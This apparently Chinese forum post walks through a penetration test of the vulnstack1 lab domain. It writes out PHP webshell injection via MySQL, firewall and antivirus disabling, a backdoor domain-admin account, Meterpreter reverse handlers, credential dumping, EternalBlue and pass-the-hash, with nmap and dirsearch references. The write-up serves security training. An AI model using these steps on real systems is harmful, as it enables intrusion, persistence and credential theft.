兜兜零元 发表于 2023-8-30 18:34:32

vulnstack1 红日靶场渗透详解

目录

[*]环境搭建
[*]信息收集
[*]PhpMyAdmin 后台 Getshell

[*]into outfile
[*]Mysql日志文件写入shell

[*]CS后渗透
[*]MSF后渗透
[*]知识补充

[*]nmap

[*]参数分类
[*]参数速查表

[*]dirsearch


环境搭建

ip段设置
kali (coleak):192.168.145.139
Windows 7 (stu1):192.168.10.181、192.168.145.140
Winserver 2008 (owa):192.168.10.180
Win2k3 (root-tvi862ubeh):192.168.10.182kali可以访问win7,但不能直接访问win08和win2k3
开启win7 web/mysql服务
信息收集

端口扫描
sudo nmap -sS -p 1-65535 -v 192.168.145.14080/tcp   openhttp
3306/tcp openmysql
web目录扫描
dirsearch -u http://192.168.145.140/https://img2023.cnblogs.com/blog/2840754/202308/2840754-20230821150410455-1807662531.png
爆破登录
访问80端口是一个phpStudy 探针,结合phpinfo.php和探针知晓主目录在C:/phpStudy/WWW
bp爆破mysql的root弱口令获得root的密码
进入phpmyadmin,用root/root尝试登录成功
PhpMyAdmin 后台 Getshell

phpmyadmin有两种getshell方式


[*]into outfile导出木马
[*]利用Mysql日志文件getshell
into outfile

需看要secure_file_priv的值。 当value为“null”时,不允许读取任意文件,当value为“空”时,允许读取任意文件,value可也已设置为其他路径。
select @@basedir;   #查看一下网站的路径 C:/phpStudy/MySQL/
select '<?php eval($_POST);?>' into outfile 'C:/phpStudy/www/hack.php';
show global variables like '%secure%';    #secure_auth OFF;secure_file_priv NULL当secure_file_priv为NULL时,表示限制Mysql不允许导入导出,这里为NULL。所以into outfile写入木马出错。要想使得该语句导出成功,则需要在Mysql文件夹下修改my.ini 文件,在内加入secure_file_priv =""。(windows下修改配置文件:mysql.ini linux修改配置文件:my.cnf)
Mysql日志文件写入shell

show variables like '%general%';   #查看日志状态:
SET GLOBAL general_log='on';    #开启 general_log
SET GLOBAL general_log_file='C:/phpStudy/www/hack.php';   
#指定日志写入到网站根目录的 hack.php 文件
show variables like '%general%';general_logONgeneral_log_fileC:/phpStudy/www/hack.phpSELECT '<?php eval($_POST["cmd"]);?>'; 即可将一句话木马写入 hack.php 文件中https://img2023.cnblogs.com/blog/2840754/202308/2840754-20230821150439958-1804728299.png
CS后渗透

上传免杀后门qm.exe上线cs
https://img2023.cnblogs.com/blog/2840754/202308/2840754-20230821150451790-155275730.png
关闭防火墙
#注册表开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

#添加防火墙规则
netsh advfirewall firewall add rule name="Open 3389" dir=in action=allow protocol=TCP localport=3389

#关闭防火墙
netsh firewall set opmode disable                           #winsows server 2003 之前
netsh advfirewall set allprofiles state off         #winsows server 2003 之后

netsh advfirewall show allprofile state //展示状态
netsh advfirewall set allprofiles state off //关闭防火墙查看用户为god\administrator域管权限,收集域内信息
net view               # 查看局域网内其他主机名
net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user               # 查看本机用户列表
net user /domain         # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain         # 查看有几个域(域名获取)
net user 用户名 /domain   # 获取指定域用户的信息
net group /domain      # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain    # 查看域中某工作组
net group "domain admins" /domain# 查看域管理员的名字
net group "domain computers" /domain# 查看域中的其他主机名
net group "doamin controllers" /domain# 查看域控制器主机名(可能有多台)
网络扫描、端口扫描抓取hash和明文密码,然后查看密码凭证net view        #\\OWA \\ROOT-TVI862UBEH还有两台主机jump psexec OWA smb
jump psexec root-tvi862ubeh smb
三台主机全部上线选择psexec横向移动
https://img2023.cnblogs.com/blog/2840754/202308/2840754-20230821150521501-1565289899.png
网络拓扑图如下
https://img2023.cnblogs.com/blog/2840754/202308/2840754-20230821150533188-2131349794.png
VPN部署
https://img2023.cnblogs.com/blog/2840754/202308/2840754-20230821150540581-2032629243.png
sudo ifconfig phear0 192.168.10.0/24
ping 192.168.10.180
nmap 192.168.10.167 -sT -A -p 445代理远程桌面
// 添加test用户net user test p-0p-0p-0 /add /domain
// 把 test 用户添加进域管理员组net group "domain admins" test /add /domain
// 查看域管理员net group "domain admins" /domain
rdesktop 192.168.10.180
god\test p-0p-0-p-0MSF后渗透

CS派生会话给MSF
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.145.139
set lport 4566
runhttps://img2023.cnblogs.com/blog/2840754/202308/2840754-20230821150554833-1887388121.png
新建会话到该新建的监听器
查看主机是否运行在虚拟机上
run post/windows/gather/checkvm关闭掉目标主机的杀毒软件,通过命令
run post/windows/manage/killav获取目标主机的详细信息
sysinfometerpreter > sysinfo
Computer      : STU1
OS            : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : zh_CN
Domain          : GOD
Logged On Users : 3
Meterpreter   : x86/windows
Meterpreter支持非常多的文件系统命令(基本跟Linux系统命令类似),一些常用命令如下:
pwd:当前所在位置
ls:获取当前目录下的文件
cd:切换目标目录;
cat:读取文件内容;
rm:删除文件;
edit:使用vim编辑文件
mkdir:新建目录;
rmdir:删除目录;
upload file 命令则能够向目标系统上传文件。
download file 命令可以帮助我们从目标系统中下载文件获取内网网段信息
run get_local_subnets

# 可以用模块自动添加路由
run post/multi/manage/autoroute
#添加一条路由
run autoroute -s 192.168.10.0/24
#查看路由添加情况
run autoroute -pSubnet             Netmask            Gateway
169.254.0.0      255.255.0.0      Session 1
192.168.10.0       255.255.255.0      Session 1
192.168.145.0      255.255.255.0      Session 1
配置并启用隧道
use auxiliary/server/socks_proxy
set SRVPORT 8999
setg Proxies socks5:192.168.145.139:8999
setg ReverseAllowProxy true横向移动
background
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.10.181
set ports 80,135-139,445,3306,3389
run[+] 192.168.10.181:       - 192.168.10.181:80 - TCP OPEN
[+] 192.168.10.181:       - 192.168.10.181:135 - TCP OPEN
[+] 192.168.10.181:       - 192.168.10.181:139 - TCP OPEN
[+] 192.168.10.181:       - 192.168.10.181:445 - TCP OPEN
[+] 192.168.10.181:       - 192.168.10.181:3306 - TCP OPEN
[+] 192.168.10.181:       - 192.168.10.181:3389 - TCP OPEN
set rhosts 192.168.10.182
run[+] 192.168.10.182:       - 192.168.10.182:135 - TCP OPEN
[+] 192.168.10.182:       - 192.168.10.182:139 - TCP OPEN
[+] 192.168.10.182:       - 192.168.10.182:445 - TCP OPEN
有445端口,尝试永恒之蓝ms17-010攻击
漏洞扫描
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.10.181
run利用(内网环境,需要正向shell连接)
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.10.181
run并没有拿到shell,ms17-010直接拿到shell的情况并不多,成功率不高
哈希传递攻击(PTH)
hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::ps:ms6中 mimikatz模块已经合并为kiwi模块
load kiwi

creds_all#列举所有凭据
creds_kerberos#列举所有kerberos凭据
creds_msv#列举所有msv凭据
creds_ssp#列举所有ssp凭据
creds_tspkg#列举所有tspkg凭据
creds_wdigest#列举所有wdigest凭据
dcsync#通过DCSync检索用户帐户信息
dcsync_ntlm#通过DCSync检索用户帐户NTLM散列、SID和RID
golden_ticket_create#创建黄金票据
kerberos_ticket_list#列举kerberos票据
kerberos_ticket_purge#清除kerberos票据
kerberos_ticket_use#使用kerberos票据
kiwi_cmd#执行mimikatz的命令,后面接mimikatz.exe的命令
lsa_dump_sam#dump出lsa的SAM
lsa_dump_secrets#dump出lsa的密文
password_change#修改密码
wifi_list#列出当前用户的wifi配置文件
wifi_list_shared#列出共享wifi配置文件/编码抓取失败了,emmmm,重新上线cs抓取
Primary
       * Username : Administrator
       * Domain   : GOD
       * NTLM   : 8a963371a63944419ec1adf687bb1be5psexec|hash传递
在 Metasploit 中,经常使用于哈希传递攻击的模块有:
auxiliary/admin/smb/psexec_command   #在目标机器上执行系统命令
exploit/windows/smb/psexec         #用psexec执行系统命令
exploit/windows/smb/psexec_psh       #使用powershell作为payload探测445
use auxiliary/scanner/smb/smb_version
set rhost 192.168.10.180
set threads 40
run
set rhost 192.168.10.182
runexploit/windows/smb/psexec模块哈希传递攻击 Windows Server 2008
use exploit/windows/smb/psexec
set rhosts 192.168.10.181
set SMBUser administrator
set smbpass 00000000000000000000000000000000:8a963371a63944419ec1adf687bb1be5
run知识补充

nmap

参数分类

主机发现
-sL                                                    仅列出指定网络的每个主机,不发送探测
-sn                                                    在发现主机后不进行端口探测
-Pn                                                    将所有主机视为在线,不进行主机发现,由ICMP回显请求、TCP SYN 到端口 443、TCP ACK 到端口 80 和 ICMP 默认情况下的时间戳请求组成
-PS/-PA/-PU/-PY<port>                 对给定端口进行TCP的SYN/ACK,UDP 或 SCTP扫描,参数和端口之间不能有空格
-PE/-PP/-PM                     ICMP回显,时间戳和网络掩码请求探测
-PO <协议列表>                                         发送具有指定协议编号的IP数据包
--disable-arp-ping或--send-ip         对于本地以太网上的主机不进行ARP扫描,而是IP地址扫描,默认是ARP
--discovery-ignore-rst                         不理RST回复,有时防火墙会欺骗RST回复,而响应对不存在的地址的探测
--traceroute                                         路由跟踪扫描
-A                         此选项设置包含了1-10000的端口ping扫描,操作系统扫描,脚本扫描,路由跟踪,服务探测
-6                         使用IPv6端口扫描
-sU                                                   UDP扫描
-sT                                                   TCP扫描
-sS                                                        SYN半开放扫描
-sN                                                   TCP空扫描,如果向关闭端口发送不包含RST的请求,将回复RST作为响应
-sF                                                   FIN标志的数据包扫描
-b <FTP中继主机>                                  FTP退回扫描(<用户名>:<密码>@<服务器>:<端口>),一种利用FTP服务器的间接扫描
-sX                                                   圣诞树扫描
-sA                                                   TCP ACK扫描,探测端口是否被防火墙屏蔽
-sW                                                   TCP窗口扫描,这与ACK扫描相同,但通过TCP窗口字段检测端口是否开放,准确率不高
-sM                                                   TCP迈蒙扫描,以起发现者命名
-sI                                                   TCP空闲扫描,一种间接的扫描
--scanflags <要设置的TCP标注位>         可以自己指定TCP标志位,还可以同时设置TCP扫描类型(-sA,-sF)以告诉nmap如何解释响应
-sY                                                   SCTP INIT扫描即SCTP初始化扫描
-sZ                                                   SCTP COOKIE ECHO扫描,开放的端口将丢弃包含COOKIE ECHO的数据包,但端口是关闭将回复ABORT
-sO                                                   扫描端口支持的IP协议
-Pn -sn                                                 跳过主机发现和端口扫描,但仍可以运行NSE(脚本)
-sP                                                        用类似ping扫描服务和系统探测
-sV                                                 Version版本检测扫描, 用来扫描目标主机和端口上运行的软件的版本
--version-intensity                 设置版本扫描的强度0-9,默认7,强度越高准确率越高时间越长
--version-all                                 尝试每个强度的探测
--version-trace                         显示详细的版本扫描活动
--allports                                         默认nmap版本扫描时不扫一些端口,这将扫所有端口
-O                                                   操作系统类型的探测
--osscan-guess(--fuzzy)   猜测匹配操作系统,配合-O
--osscan-limit                                限制Nmap只对有希望确定的主机的进行OS探测(至少需确知该主机分别有一个open和closed的端口)
--max-os-trys                                 设置对目标的最大尝试次数,默认5脚本
-sC                                                   默认脚本扫描,即--script=default,这些脚本具有入侵性
--script <filename>|<category>|<directory>/|<expression>[,...]每元素首先被解释为表达式,然后被解释为类别,并且 最后作为文件或目录名称。
--script-args                                  为脚本提供参数
--script-args-file <filename>         从文件向脚本通过参数
--script-help                                         获取脚本说明
--script-updatedb                                 更新找到的脚本数据库设置时序和性能
--min-hostgroup <number>;--max-hostgroup <number>            nmap是一次性扫描一个组的主机,这设置一个组的最大和最小自己数
--host_timeout                                         设置扫描一台主机的时间,以毫秒为单位,默认无时限
-T<0-5>                                           设置时间模版paranoid (0)、sneaky (1)、polite (2)、normal(3)、 aggressive (4)、insane (5)
paranoid、sneaky模式用于IDS躲避
Polite模式降低了扫描速度以使用更少的带宽和目标主机资源。
Normal为默认模式,因此 -T 3实际上是未做任何优化。
Aggressive模式假设用户具有合适及可靠的网络从而加速扫描.
nsane模式假设用户具有特别快的网络或者愿意为获得速度而牺牲准确性扫描结果
open                                        端口开放
closed                                         端口是关闭
filtered                                 端口被防火墙IDS/IPS屏蔽,不能确定状态
unfiltered                                 端口没被屏蔽,但是否开放还要进一步确定
open|filtered                         端口是开放或被屏蔽,Nmap不能识别
closeed|filtered                 端口是关闭或被屏蔽,Nmap不能识别设置输出
-oN <文件>                                    输出到文件
-oX <文件>                                输出到XML文件
-oG grep-output.txt                扫描的结果输出到屏幕,同时会存储一份到grep-output.txt
-v(-vv) <级别>             详细输出扫描
-d <级别>                                        设置调试级别,当即使是详细模式也无法提供足够的数据时,调试可用于提供更多内容
--reason                                         显示主机和端口状态原因
--open                                                仅显示打开或可能打开的端口
-append-output                                附加到而不是清空输出文件,为输出格式标志指定文件名时 例如 -oX 或 -oN,即 文件默认被覆盖参数速查表

参数(区分大小写)说明-sTTCP connect()扫描,这种方式会在目标主机的日志中记录大批连接请求和错误信息。-sS半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限。-sF-sN秘密FIN数据包扫描、Xmas Tree、Null扫描模式-sPping扫描,Nmap在扫描端口时,默认都会使用ping扫描,只有主机存活,Nmap才会继续扫描。-sUUDP扫描,但UDP扫描是不可靠的-sA这项高级的扫描方法通常用来穿过防火墙的规则集-sV探测端口服务版本-Pn扫描之前不需要用ping命令,有些防火墙禁止ping命令。可以使用此选项进行扫描-v显示扫描过程,推荐使用-h帮助选项,是最清楚的帮助文档-p指定端口,如“1-65535、1433、135、22、80”等-O启用远程操作系统检测,存在误报-A全面系统检测、启用脚本检测、扫描等-oN/-oX/-oG将报告写入文件,分别是正常、XML、grepable 三种格式-T4针对TCP端口禁止动态扫描延迟超过10ms-iL读取主机列表,例如,“-iL C:\ip.txt”dirsearch

采用默认设置扫描目标url
python3 dirsearch.py -u https://target

使用文件拓展名为php,html,js的字典扫描目标url
python3 dirsearch.py -e php,html,js -u https://target

采用指定路径的wordlist且拓展名为php,html,js的字典扫描目标url
python3 dirsearch.py -e php,html,js -u https://target -w /path/to/wordlist

递归扫描
python3 dirsearch.py -e php,html,js -u https://target -r

设置递归层数为3
python3 dirsearch.py -e php,html,js -u https://target -r -R 3

指定线程(不建议线程数调整过大,可能会影响扫描的结果)
python3 dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页: [1]
查看完整版本: vulnstack1 红日靶场渗透详解